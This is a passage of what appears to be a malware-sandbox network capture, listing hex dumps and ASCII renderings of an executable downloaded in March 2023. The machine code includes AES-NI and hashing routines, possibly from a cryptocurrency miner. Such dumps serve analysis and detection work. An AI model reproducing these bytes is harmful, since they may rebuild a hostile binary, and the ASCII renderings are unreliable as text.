                                                                                                                                                                                                                    Data Ascii: I$LPHIHBH9QA$C$HB0H=C1H9LH5CR(I$DLB`I9M$ I$I$HL{%I9I$E$fx@tZ@tuNHB`H9I$HME1LH[^_]A\A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC961INData Raw: 24 50 02 00 00 66 0f ef c0 4c 8d b4 24 e8 03 00 00 48 c7 44 24 70 00 00 00 00 4c 89 f9 0f 11 44 24 60 48 8d b4 24 c0 00 00 00 e8 3c 6c 4c 00 4c 89 fa 4c 89 f1 c7 84 24 e0 03 00 00 01 00 00 00 e8 06 6c 4c 00 8b 84 24 e0 03 00 00 4d 89 f1 48 89 f1 4c 8d 05 9e 2a 58 00 89 44 24 20 49 8d 50 e3 e8 f5 91 4f 00 f3 0f 6f 8c 24 c0 01 00 00 48 8b 8c 24 f0 01 00 00 66 0f ef c0 0f 11 84 24 c0 01 00 00 0f 11 8c 24 f0 03 00 00 48 85 c9 74 39 48 8b 84 24 38 02 00 00 48 8b bc 24 18 02 00 00 48 8d 68 08 48 39 fd 76 1b 66 90 48 8b 0f 48 83 c7 08 e8 c4 af 50 00 48 39 fd 77 ef 48 8b 8c 24 f0 01 00 00 e8 b2 af 50 00 48 8b 8c 24 d0 01 00 00 48 8d 84 24 e0 01 00 00 48 39 c1 74 05 e8 98 af 50 00 48 8b bc 24 c8 01 00 00 48 85 ff 74 0b f0 83 6f 08 01 0f 84 00 05 00 00 48 8b 8c 24
                                                                                                                                                                                                                    Data Ascii: $PfL$HD$pLD$`H$<lLLL$lL$MHL*XD$ IPOo$H$f$$Ht9H$8H$HhH9vfHHPH9wH$PH$H$H9tPH$HtoH$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC977INData Raw: 4c 63 84 24 9c 00 00 00 46 33 bc 84 00 01 00 00 44 8b 04 24 45 01 f8 41 01 c0 42 33 9c 8c 00 01 00 00 44 31 c1 41 89 d9 c1 c1 10 45 01 c1 41 01 cc 44 31 e0 c1 c8 0c 41 8d 1c 01 31 d9 c1 c9 08 41 01 cc 89 4c 24 48 8b 4c 24 78 44 31 e0 44 89 64 24 38 41 89 c6 48 63 84 24 94 00 00 00 41 c1 ce 07 33 8c 84 00 01 00 00 8b 44 24 1c 03 4c 24 24 4c 63 8c 24 90 00 00 00 01 d1 44 8b 64 24 7c 31 c8 46 33 a4 8c 00 01 00 00 c1 c0 10 41 01 cc 44 8d 44 05 00 44 31 c2 c1 ca 0c 41 01 d4 44 31 e0 c1 c8 08 41 8d 2c 00 31 ea c1 ca 07 89 54 24 44 48 8d 15 53 f5 57 00 48 39 d6 0f 85 9a fb ff ff 48 8b b4 24 f0 01 00 00 44 8b 5c 24 30 89 1c 24 44 89 eb 44 8b 94 24 bc 00 00 00 48 8b 8c 24 f0 01 00 00 41 89 ef 8b 56 04 44 8b 8c 24 b8 00 00 00 49 89 c8 44 8b 6c 24 48 8b 6c 24 44 44
                                                                                                                                                                                                                    Data Ascii: Lc$F3D$EAB3D1AEAD1A1AL$HL$xD1Dd$8AHc$A3D$L$$Lc$Dd$|1F3ADDD1AD1A,1T$DHSWH9H$D\$0$DD$H$AVD$IDl$Hl$DD
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC993INData Raw: b8 e0 00 00 00 48 c1 e6 08 48 09 d6 48 8d 54 24 50 48 89 74 24 28 f3 0f 6f 4c 24 20 0f 11 4c 24 60 e8 65 c2 ff ff 44 8b 84 24 20 01 00 00 31 c0 44 8b 8c 24 28 01 00 00 8b 94 24 24 01 00 00 c6 44 24 46 80 44 89 c1 c6 44 24 47 00 44 01 c9 0f 92 c0 89 cd 89 cf 89 ce 83 f8 01 0f b6 c1 83 da ff c1 ed 08 40 0f b6 ed 48 c1 e0 08 41 89 d2 41 89 d3 c1 ef 10 48 09 e8 c1 ee 18 89 d3 40 0f b6 ff 48 c1 e0 08 40 0f b6 f6 0f b6 d2 c1 eb 08 48 09 f8 41 c1 eb 10 48 c1 e0 08 41 c1 ea 18 48 09 f0 48 c1 e0 08 48 09 d0 0f b6 d3 48 c1 e0 08 48 09 d0 41 0f b6 d3 48 c1 e0 08 48 09 d0 41 0f b6 d2 48 c1 e0 08 48 09 d0 48 89 44 24 48 41 81 f9 b8 01 00 00 0f 84 01 04 00 00 41 81 f9 b7 01 00 00 0f 8f 64 03 00 00 41 b8 b8 01 00 00 45 85 c9 b8 01 00 00 00 0f 45 84 24 2c 01 00 00 81 e9
                                                                                                                                                                                                                    Data Ascii: HHHT$PHt$(oL$ L$`eD$ 1D$($$D$FDD$GD@HAAH@H@HAHAHHHHHAHHAHHHD$HAAdAEE$,
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1009INData Raw: 48 ba 54 5a 46 78 cc 8c dd 4b 48 89 84 24 d0 00 00 00 48 b8 8a 22 5e 8d 0c 97 ef 0b 48 89 94 24 d8 00 00 00 48 ba e9 34 12 59 f2 b3 c3 61 48 8b 9c 24 80 01 00 00 48 89 5c 24 48 48 81 fb ff 01 00 00 0f 86 81 0b 00 00 48 89 df 48 8b 9c 24 78 01 00 00 4c 8d 74 24 40 48 81 ef 00 02 00 00 4c 89 74 24 28 48 c1 ef 09 48 89 7c 24 38 48 c1 e7 06 48 01 df 48 89 7c 24 30 eb 38 48 8b 74 24 60 4c 8b 5c 24 68 48 83 c3 40 48 8b 44 24 70 48 8b 54 24 78 48 8b 8c 24 80 00 00 00 4c 8b 84 24 88 00 00 00 4c 8b 8c 24 90 00 00 00 4c 8b 94 24 98 00 00 00 48 8b 3b 48 8b 6b 08 4c 8b 7b 28 4c 8b 73 38 49 89 fd 48 89 bc 24 e0 00 00 00 48 8b 7b 10 48 89 ac 24 e8 00 00 00 48 8b 6b 18 4c 31 ee 4d 31 f2 4c 89 bc 24 08 01 00 00 49 89 fc 4c 8b 7b 30 48 89 bc 24 f0 00 00 00 48 8b 7b 20 4c
                                                                                                                                                                                                                    Data Ascii: HTZFxKH$H"^H$H4YaH$H\$HHHH$xLt$@HLt$(HH|$8HHH|$08Ht$`L\$hH@HD$pHT$xH$L$L$L$H;HkL{(Ls8IH$H{H$HkL1M1L$IL{0H$H{ L
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1025INData Raw: 73 fc 04 66 0f ef c1 66 41 0f ef c2 66 44 0f 6f e0 66 0f 3a df d8 00 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db aa 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e4 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 0f ef c2 66 44 0f 6f d8 66 0f 3a df d8 04 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db ff 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e3 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 41 0f ef c4 66 44 0f 6f f0 66 0f 3a df d8 00 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db aa 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e6 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 41 0f ef c3 66 44 0f 6f e8 66 0f 3a df d8 08 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db ff 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e5 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 41 0f ef c6
                                                                                                                                                                                                                    Data Ascii: sffAfDof:fofsfpfoffAofsfsffffDof:fofsfpfoffAofsfsfffAfDof:fofsfpfoffAofsfsfffAfDof:fofsfpfoffAofsfsfffA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1041INData Raw: 00 00 00 49 89 d0 e9 25 fd ff ff 48 81 ec e8 00 00 00 0f 11 74 24 40 0f 11 7c 24 50 44 0f 11 44 24 60 44 0f 11 4c 24 70 44 0f 11 94 24 80 00 00 00 44 0f 11 9c 24 90 00 00 00 44 0f 11 a4 24 a0 00 00 00 44 0f 11 ac 24 b0 00 00 00 44 0f 11 b4 24 c0 00 00 00 44 0f 11 bc 24 d0 00 00 00 b8 10 00 00 00 f3 44 0f 6f 01 f3 44 0f 6f 79 10 4c 8b 81 e0 00 00 00 f3 44 0f 6f 49 40 66 41 0f 6f d8 f3 0f 6f 79 60 66 41 0f 3a df d7 01 f3 0f 6f 71 70 66 0f 73 fb 04 66 0f 70 d2 ff f3 0f 6f a9 80 00 00 00 66 0f 6f cb 44 0f 11 44 24 10 66 0f 73 f9 04 44 0f 11 44 24 30 66 0f 6f c1 66 0f ef cb 66 0f 73 f8 04 66 0f ef c2 66 41 0f 6f d7 66 0f 73 fa 04 66 0f ef c1 66 0f 6f da 66 41 0f ef c0 66 0f 73 fb 04 66 44 0f 6f d0 66 0f 3a df c8 00 66 0f 6f c3 66 0f 70 c9 aa 66 41 0f 6f e2 66
                                                                                                                                                                                                                    Data Ascii: I%Ht$@|$PDD$`DL$pD$D$D$D$D$D$DoDoyLDoI@fAooy`fA:oqpfsfpofoDD$fsDD$0foffsffAofsffofAfsfDof:fofpfAof
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1057INData Raw: 66 0f 38 dc f3 66 0f 38 dc eb 66 0f 38 dc d3 66 41 0f 38 dc cb 66 41 0f 38 dc e3 66 41 0f 38 dc c3 66 45 0f 38 dc cb 66 41 0f 38 dc fb 66 41 0f 38 dc f3 66 41 0f 38 dc eb 66 41 0f 38 dc d3 66 41 0f 38 dc cd 66 41 0f 38 dc e5 66 41 0f 38 dc c5 66 45 0f 38 dc cd 66 41 0f 38 dc fd 66 41 0f 38 dc f5 66 41 0f 38 dc ed 66 41 0f 38 dc d5 66 41 0f 38 dc cc 66 41 0f 38 dc e4 66 41 0f 38 dc c4 66 45 0f 38 dc cc 66 41 0f 38 dc fc 66 41 0f 38 dc f4 66 41 0f 38 dc ec 66 41 0f 38 dc d4 66 41 0f 38 dc ca 66 41 0f 38 dc e2 66 41 0f 38 dc c2 66 45 0f 38 dc ca 66 41 0f 38 dc fa 66 41 0f 38 dc f2 66 41 0f 38 dc ea 66 41 0f 38 dc d2 66 41 0f 38 dc f8 66 41 0f 38 dc f0 66 41 0f 38 dc d0 66 41 0f 38 dc c8 66 41 0f 38 dc e0 66 41 0f 38 dc c0 0f 11 54 24 20 66 45 0f 38 dc c8 66
                                                                                                                                                                                                                    Data Ascii: f8f8f8fA8fA8fA8fE8fA8fA8fA8fA8fA8fA8fA8fE8fA8fA8fA8fA8fA8fA8fA8fE8fA8fA8fA8fA8fA8fA8fA8fE8fA8fA8fA8fA8fA8fA8fA8fA8fA8fA8T$ fE8f
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1073INData Raw: 73 fc 04 66 0f ef d3 66 0f ef d0 66 0f 6f cc 66 41 0f ef d7 66 0f 73 f9 04 66 0f 6f c1 66 0f 3a df da 02 66 0f ef cc 0f 11 54 24 30 66 0f 70 db ff 66 0f 73 f8 04 66 0f 6f e2 66 0f ef c3 66 0f 73 fc 04 66 0f ef c1 66 41 0f ef c2 66 44 0f 6f e0 66 0f 3a df d8 00 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db aa 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e4 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 0f ef c2 66 44 0f 6f d8 66 0f 3a df d8 04 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db ff 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e3 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 41 0f ef c4 66 44 0f 6f f0 66 0f 3a df d8 00 66 0f 6f c4 66 0f 73 f8 04 66 0f 70 db aa 66 0f 6f c8 66 0f ef c4 66 41 0f 6f e6 66 0f 73 f9 04 66 0f 73 fc 04 66 0f ef cb 66 0f ef c1 66 41
                                                                                                                                                                                                                    Data Ascii: sfffofAfsfof:fT$0fpfsfoffsffAfDof:fofsfpfoffAofsfsffffDof:fofsfpfoffAofsfsfffAfDof:fofsfpfoffAofsfsfffA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1089INData Raw: 24 28 48 89 54 24 20 4c 89 f2 44 0f 11 8c 24 90 00 00 00 e8 43 e3 ff ff 4c 89 64 24 40 49 89 f1 49 89 d8 48 8b 44 24 68 48 8b 54 24 60 48 89 6c 24 38 4c 89 e9 48 89 7c 24 30 48 89 44 24 28 48 89 54 24 20 4c 89 f2 44 0f 11 84 24 90 00 00 00 e8 06 e3 ff ff 4c 89 64 24 40 49 89 f1 49 89 d8 48 8b 44 24 68 48 8b 54 24 60 48 89 6c 24 38 4c 89 e9 48 89 7c 24 30 48 89 44 24 28 48 89 54 24 20 4c 89 f2 0f 11 bc 24 90 00 00 00 e8 ca e2 ff ff 4c 89 64 24 40 49 89 f1 49 89 d8 48 8b 54 24 60 48 8b 44 24 68 48 89 6c 24 38 4c 89 e9 48 89 7c 24 30 48 89 54 24 20 4c 89 f2 48 89 44 24 28 0f 11 b4 24 90 00 00 00 e8 8e e2 ff ff 4c 8b 54 24 70 f3 0f 6f 84 24 a0 00 00 00 f3 0f 6f 8c 24 b0 00 00 00 f3 0f 6f 94 24 c0 00 00 00 41 0f 11 47 80 49 83 ea 80 f3 0f 6f 9c 24 d0 00 00 00
                                                                                                                                                                                                                    Data Ascii: $(HT$ LD$CLd$@IIHD$hHT$`Hl$8LH|$0HD$(HT$ LD$Ld$@IIHD$hHT$`Hl$8LH|$0HD$(HT$ L$Ld$@IIHT$`HD$hHl$8LH|$0HT$ LHD$($LT$po$o$o$AGIo$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1105INData Raw: 44 0f 6f 94 24 60 01 00 00 48 89 44 24 68 f3 44 0f 6f 8c 24 70 01 00 00 48 8b 44 24 70 f3 44 0f 6f 84 24 80 01 00 00 f3 0f 6f bc 24 90 01 00 00 f3 0f 6f b4 24 c0 01 00 00 e9 a3 02 00 00 0f 1f 44 00 00 0f 18 08 0f 18 48 40 48 89 44 24 70 48 8b 44 24 68 4c 89 7c 24 40 49 89 f1 49 89 d8 4c 89 ea 48 89 44 24 20 4c 89 e1 4c 89 74 24 38 48 89 6c 24 30 48 89 7c 24 28 44 0f 11 ac 24 a0 00 00 00 e8 d4 a2 ff ff 4c 89 7c 24 40 49 89 f1 49 89 d8 48 8b 44 24 68 4c 89 74 24 38 4c 89 ea 4c 89 e1 48 89 6c 24 30 48 89 44 24 20 48 89 7c 24 28 44 0f 11 a4 24 a0 00 00 00 e8 9c a2 ff ff 4c 89 7c 24 40 49 89 f1 49 89 d8 48 8b 44 24 68 4c 89 74 24 38 4c 89 ea 4c 89 e1 48 89 6c 24 30 48 89 44 24 20 48 89 7c 24 28 44 0f 11 9c 24 a0 00 00 00 e8 64 a2 ff ff 4c 89 7c 24 40 49 89 f1
                                                                                                                                                                                                                    Data Ascii: Do$`HD$hDo$pHD$pDo$o$o$DH@HD$pHD$hL|$@IILHD$ LLt$8Hl$0H|$(D$L|$@IIHD$hLt$8LLHl$0HD$ H|$(D$L|$@IIHD$hLt$8LLHl$0HD$ H|$(D$dL|$@I
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1121INData Raw: 1f 40 00 81 78 20 65 01 15 63 4c 8b 40 10 48 8b 48 18 77 0f 48 85 c9 74 1a 48 89 c8 eb e5 0f 1f 44 00 00 49 89 c1 4d 85 c0 74 08 4c 89 c0 eb d3 0f 1f 00 4c 39 cb 0f 84 ef 61 00 00 41 81 79 20 66 01 15 63 0f 87 e1 61 00 00 49 8b 41 28 48 8d 0d 96 26 3d 00 48 89 88 c8 00 00 00 c7 84 24 a8 04 00 00 66 01 15 63 49 89 d8 90 81 7a 20 65 01 15 63 48 8b 4a 10 48 8b 42 18 77 0f 48 85 c0 74 1a 48 89 c2 eb e5 0f 1f 44 00 00 48 85 c9 74 0e 49 89 d0 48 89 ca eb d3 0f 1f 00 4c 89 c2 48 39 d3 74 09 81 7a 20 66 01 15 63 76 1b 4c 8d 84 24 10 01 00 00 4c 89 e1 4c 89 ac 24 10 01 00 00 e8 27 ad fe ff 48 89 c2 48 8b 42 28 48 8d 15 79 2a 3d 00 4c 89 e1 48 89 90 40 01 00 00 4c 89 ea c7 84 24 a8 04 00 00 66 01 15 63 e8 6c aa 49 00 48 8b 00 48 8d 15 f2 b6 36 00 48 89 90 f0 00 00
                                                                                                                                                                                                                    Data Ascii: @x ecL@HHwHtHDIMtLL9aAy fcaIA(H&=H$fcIz ecHJHBwHtHDHtIHLH9tz fcvL$LL$'HHB(Hy*=LH@L$fclIHH6H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1137INData Raw: 50 c7 84 24 a8 04 00 00 00 02 12 63 49 89 d8 0f 1f 40 00 81 7a 20 ff 01 12 63 48 8b 4a 10 48 8b 42 18 77 0f 48 85 c0 74 1a 48 89 c2 eb e5 0f 1f 44 00 00 48 85 c9 74 0e 49 89 d0 48 89 ca eb d3 0f 1f 00 4c 89 c2 48 39 d3 74 09 81 7a 20 00 02 12 63 76 1b 4c 8d 84 24 88 04 00 00 4c 89 e1 4c 89 ac 24 88 04 00 00 e8 7f 6d fe ff 48 89 c2 48 8b 42 28 48 8d 15 01 86 3a 00 4c 89 e1 48 89 90 a0 00 00 00 4c 89 ea c7 84 24 a8 04 00 00 00 02 12 63 e8 c4 6a 49 00 48 8b 00 48 8d 15 2a 45 3c 00 4c 89 e1 48 89 90 c8 00 00 00 4c 89 ea c7 84 24 a8 04 00 00 00 02 12 63 e8 9d 6a 49 00 48 8b 00 48 8d 15 93 4e 3c 00 4c 89 e1 48 89 90 40 01 00 00 4c 89 ea c7 84 24 a8 04 00 00 00 02 12 63 e8 76 6a 49 00 48 8b 00 48 8d 15 7c 8c 35 00 4c 89 e1 48 89 90 f0 00 00 00 4c 89 ea c7 84 24
                                                                                                                                                                                                                    Data Ascii: P$cI@z cHJHBwHtHDHtIHLH9tz cvL$LL$mHHB(H:LHL$cjIHH*E<LHL$cjIHHN<LH@L$cvjIHH|5LHL$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1153INData Raw: c4 42 25 dc d8 c4 62 1d dc e7 c4 62 15 dc ef c4 e2 7d dc c7 c4 62 25 dc df c4 62 1d dc e6 c4 62 15 dc ee c4 e2 7d dc c6 c4 62 25 dc de c4 62 1d dc e5 c4 62 15 dc ed c4 e2 7d dc c5 c4 62 25 dc dd c4 62 1d dc e4 c4 62 15 dc ec c4 e2 7d dc c4 c4 62 25 dc dc c4 62 1d dc e3 c4 62 15 dc eb c4 e2 7d dc c3 c4 62 25 dc db c4 62 1d dc e2 c4 62 15 dc ea c4 e2 7d dc c2 c4 62 25 dc da c4 62 1d dc e1 c4 62 15 dc e9 c4 e2 7d dc c1 c4 62 25 dc d9 c5 7e 7f 60 c0 c4 41 7d 6f f4 c5 7e 7f 68 e0 c4 41 7d 6f fd c5 fe 7f 40 80 c5 7e 7f 58 a0 c5 fe 7f 44 24 60 c5 7e 7f 9c 24 80 00 00 00 48 39 c8 0f 82 e4 fe ff ff 48 89 c8 48 29 d8 48 83 e8 01 48 83 e0 80 48 8d 90 80 00 00 00 48 8d 43 01 48 39 c8 49 0f 47 d0 48 81 c1 00 08 00 00 48 01 da 4c 39 c9 0f 85 a1 00 00 00 c4 41 7d 6f fb
                                                                                                                                                                                                                    Data Ascii: B%bb}b%bb}b%bb}b%bb}b%bb}b%bb}b%bb}b%~`A}o~hA}o@~XD$`~$H9HH)HHHHCH9IGHHL9A}o
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1169INData Raw: 8b 13 48 8b 43 10 03 01 23 43 1c 49 8b 04 00 48 31 02 e9 c9 fd ff ff 0f 1f 40 00 48 8b 53 08 48 8b 03 48 8b 12 48 31 10 e9 b3 fd ff ff 66 0f 1f 44 00 00 48 8b 03 48 f7 18 e9 a2 fd ff ff 0f 1f 44 00 00 48 8b 53 08 48 8b 03 48 8b 12 e9 7d fd ff ff 66 0f 1f 84 00 00 00 00 00 48 8b 53 08 48 8b 33 48 8b 43 10 03 02 23 43 1c 49 8b 14 00 48 8b 0e e8 b4 0d 00 00 48 89 06 e9 61 fd ff ff 0f 1f 40 00 48 8b 33 48 8b 43 08 48 8b 0e 48 8b 10 e8 96 0d 00 00 48 89 06 e9 43 fd ff ff 66 0f 1f 44 00 00 48 8b 53 08 48 8b 0b 48 8b 43 10 03 02 23 43 1c 48 8b 11 49 0f af 14 00 48 89 11 e9 1d fd ff ff 0f 1f 84 00 00 00 00 00 48 8b 13 48 8b 4b 08 48 8b 02 48 0f af 01 48 89 02 e9 ff fc ff ff 66 2e 0f 1f 84 00 00 00 00 00 48 8b 4b 08 48 8b 13 48 8b 43 10 03 01 23 43 1c 49 8b 04 00
                                                                                                                                                                                                                    Data Ascii: HC#CIH1@HSHHH1fDHHDHSHH}fHSH3HC#CIHHa@H3HCHHHCfDHSHHC#CHIHHHKHHHf.HKHHC#CI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1185INData Raw: ff e9 c8 f2 ff ff 0f 1f 44 00 00 4c 89 c2 89 c8 85 ed 75 37 0f 1f 80 00 00 00 00 83 7a 04 00 0f 84 b6 f7 ff ff 83 c0 01 48 83 c2 0c 3d ae 00 00 00 75 e8 83 c1 01 49 83 c0 0c 81 f9 ae 00 00 00 0f 85 f5 f1 ff ff e9 83 f2 ff ff 83 3a 00 0f 84 87 f7 ff ff 83 7a 04 00 0f 84 7d f7 ff ff 83 c0 01 48 83 c2 0c 3d ae 00 00 00 75 df 83 c1 01 49 83 c0 0c 81 f9 ae 00 00 00 0f 85 bc f1 ff ff e9 4a f2 ff ff 0f 1f 80 00 00 00 00 4c 89 c0 89 cb 45 85 ff 75 26 66 0f 1f 44 00 00 8b 50 04 85 d2 0f 84 da f1 ff ff 83 c3 01 48 83 c0 0c 81 fb ae 00 00 00 75 e6 e9 c1 f1 ff ff 90 8b 10 85 d2 0f 84 bb f1 ff ff 8b 50 04 85 d2 0f 84 b0 f1 ff ff 83 c3 01 48 83 c0 0c 81 fb ae 00 00 00 75 dc e9 97 f1 ff ff 0f 1f 80 00 00 00 00 48 63 c6 48 c1 e0 05 48 01 c5 e9 c9 f0 ff ff 85 f6 0f 84 06
                                                                                                                                                                                                                    Data Ascii: DLu7zH=uI:z}H=uIJLEu&fDPHuPHuHcHH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1201INData Raw: 8b 1f 44 8b 5c 24 30 48 89 c1 e9 9f ed ff ff 48 8b 54 24 28 4d 89 d8 e8 27 12 31 00 4d 8b 47 08 41 8b 1f 48 89 c1 e9 5f ec ff ff 49 89 e8 4c 89 ea e8 0d 12 31 00 4d 8b 5f 08 41 8b 1f 48 89 c1 e9 bb f2 ff ff 4c 89 da 49 89 e8 e8 f3 11 31 00 49 8b 57 08 41 8b 1f 48 89 c1 e9 cd f5 ff ff ba 00 02 00 00 41 bd 10 00 00 00 48 8b 44 24 20 4c 8b 48 10 4d 8b 21 49 8b 44 24 08 4c 8d 04 02 4d 3b 04 24 0f 87 16 12 00 00 4d 89 44 24 08 49 8d 4c 04 18 e9 ae fa ff ff 48 8b 44 24 20 4c 8b 28 4d 39 e8 4d 0f 43 e8 48 83 78 08 00 0f 84 e8 0f 00 00 4d 89 ea 4c 89 5c 24 40 31 c9 4c 89 44 24 38 4c 89 4c 24 30 49 83 c2 18 0f 84 5c f5 ff ff 4c 89 d1 48 89 54 24 20 e8 4e 11 31 00 48 8b 54 24 20 48 85 c0 49 89 c2 48 89 c1 0f 84 3b f5 ff ff 4c 8b 4c 24 30 4c 89 28 b9 18 00 00 00 48
                                                                                                                                                                                                                    Data Ascii: D\$0HHT$(M'1MGAH_IL1M_AHLI1IWAHAHD$ LHM!ID$LM;$MD$ILHD$ L(M9MCHxML\$@1LD$8LL$0I\LHT$ N1HT$ HIH;LL$0L(H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1217INData Raw: 25 ff ff 3f 00 48 c1 e0 06 48 01 f8 0f 18 00 48 89 04 24 48 8d 45 02 48 25 ff ff 3f 00 48 c1 e0 06 48 01 f8 0f 18 00 48 89 44 24 08 48 8d 45 03 48 25 ff ff 3f 00 48 c1 e0 06 48 01 f8 0f 18 00 48 89 44 24 10 48 8d 45 04 48 25 ff ff 3f 00 48 c1 e0 06 48 01 f8 0f 18 00 48 89 44 24 18 4c 8d 45 01 4c 0f af 05 ef fe ff ff 4c 8b 0d f0 fe ff ff 4d 31 c1 4c 8b 15 ee fe ff ff 4d 31 c2 4c 8b 1d ec fe ff ff 4d 31 c3 4c 8b 25 ea fe ff ff 4d 31 c4 4c 8b 2d e8 fe ff ff 4d 31 c5 4c 8b 35 e6 fe ff ff 4d 31 c6 4c 8b 3d e4 fe ff ff 4d 31 c7 48 89 6c 24 20 c4 e2 7d 19 44 24 20 c5 fd d4 05 6d fe ff ff c4 e2 7d 19 0d 8c fe ff ff c5 bd 73 d0 20 c5 b5 73 d1 20 c5 7d f4 d1 c5 35 f4 d8 c5 bd f4 c1 c4 c1 25 73 f3 20 c5 fd 73 f0 20 c4 41 2d d4 d3 c5 ad d4 c0 c4 e2 7d 19 0d 61 fe ff
                                                                                                                                                                                                                    Data Ascii: %?HHH$HEH%?HHHD$HEH%?HHHD$HEH%?HHHD$LELLM1LM1LM1L%M1L-M1L5M1L=M1Hl$ }D$ m}s s }5%s s A-}a
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1233INData Raw: f5 fc ff ff 80 3b 00 0f 84 5e 01 00 00 ff 15 f4 11 9d 00 48 c7 43 18 00 00 00 00 e9 d9 fc ff ff ff d7 89 c3 e8 e2 0d 00 00 49 89 c0 41 89 d9 b9 03 00 00 00 48 8d 15 b0 37 54 00 e8 4b 2d ee ff 49 8b 4d 18 ff 15 bd 11 9d 00 49 c7 45 18 00 00 00 00 e9 a2 fc ff ff ff d7 89 c3 e8 ab 0d 00 00 49 89 c0 41 89 d9 b9 03 00 00 00 48 8d 15 39 3a 54 00 e8 14 2d ee ff e9 7d fc ff ff e8 8a 0d 00 00 48 8d 15 bb 37 54 00 b9 04 00 00 00 49 89 c0 48 81 c4 18 01 00 00 5b 5e 5f 5d 41 5c 41 5d 41 5e 41 5f e9 e3 2c ee ff 8b 84 24 f0 00 00 00 89 84 24 80 00 00 00 48 85 c0 0f 84 a7 00 00 00 48 89 c1 48 89 84 24 88 00 00 00 e8 fc 6f 4c 00 c6 00 00 49 89 c5 48 8d 48 01 bb 01 00 00 00 4c 8b 84 24 88 00 00 00 49 83 e8 01 74 0e 31 d2 e8 60 91 30 00 8b 9c 24 80 00 00 00 48 8b 06 4d 89
                                                                                                                                                                                                                    Data Ascii: ;^HCIAH7TK-IMIEIAH9:T-}H7TIH[^_]A\A]A^A_,$$HHH$oLIHHL$It1`0$HM
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1249INData Raw: 30 02 00 00 45 85 c0 0f 84 29 01 00 00 8d 41 fe 45 8b 14 81 49 89 c0 44 89 d0 c1 e8 18 48 05 00 01 00 00 8b 94 84 30 02 00 00 44 8d 5a ff 44 89 14 96 44 89 9c 84 30 02 00 00 45 85 c0 0f 84 f3 00 00 00 8d 41 fd 45 8b 14 81 49 89 c0 44 89 d0 c1 e8 18 48 05 00 01 00 00 8b 94 84 30 02 00 00 44 8d 5a ff 44 89 14 96 44 89 9c 84 30 02 00 00 45 85 c0 0f 84 bd 00 00 00 8d 41 fc 45 8b 14 81 49 89 c0 44 89 d0 c1 e8 18 48 05 00 01 00 00 8b 94 84 30 02 00 00 44 8d 5a ff 44 89 14 96 44 89 9c 84 30 02 00 00 45 85 c0 0f 84 87 00 00 00 8d 41 fb 45 8b 14 81 49 89 c0 44 89 d0 c1 e8 18 48 05 00 01 00 00 8b 94 84 30 02 00 00 44 8d 5a ff 44 89 14 96 44 89 9c 84 30 02 00 00 45 85 c0 74 55 8d 41 fa 45 8b 04 81 48 89 c1 44 89 c0 c1 e8 18 48 05 00 01 00 00 8b 94 84 30 02 00 00 44
                                                                                                                                                                                                                    Data Ascii: 0E)AEIDH0DZDD0EAEIDH0DZDD0EAEIDH0DZDD0EAEIDH0DZDD0EtUAEHDH0D
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1265INData Raw: 77 f0 4b 00 0f 1f 80 00 00 00 00 48 83 c4 20 41 5c c3 90 0f 1f 84 00 00 00 00 00 66 0f ef c0 48 c7 01 00 00 00 00 48 c7 41 08 00 00 00 00 c7 41 10 ff ff ff ff 48 c7 41 28 00 00 00 00 0f 11 41 18 c3 90 0f 1f 84 00 00 00 00 00 41 54 53 48 83 ec 28 4c 8b 21 48 89 cb 4d 85 e4 74 10 4c 89 e1 e8 36 36 fe ff 4c 89 e1 e8 0e f0 4b 00 48 8b 4b 18 48 85 c9 74 15 48 83 c4 28 5b 41 5c e9 f9 ef 4b 00 66 0f 1f 84 00 00 00 00 00 48 83 c4 28 5b 41 5c c3 0f 1f 84 00 00 00 00 00 48 8b 01 48 85 c0 74 04 48 8b 40 20 c3 90 66 90 31 c0 81 f9 ff 07 00 00 77 0d 89 c9 48 8d 05 0d c0 53 00 48 8b 04 c8 c3 0f 1f 84 00 00 00 00 00 31 c0 81 f9 ff 07 00 00 77 0d 89 c9 48 8d 05 ed ff 53 00 48 8b 04 c8 c3 0f 1f 84 00 00 00 00 00 89 c8 49 89 d2 0f bd d1 8d 49 ff 83 f2 1f 85 c1 75 1e b8 1f
                                                                                                                                                                                                                    Data Ascii: wKH A\fHHAAHA(AATSH(L!HMtL66LKHKHtH([A\KfH([A\HHtH@ f1wHSH1wHSHIIu
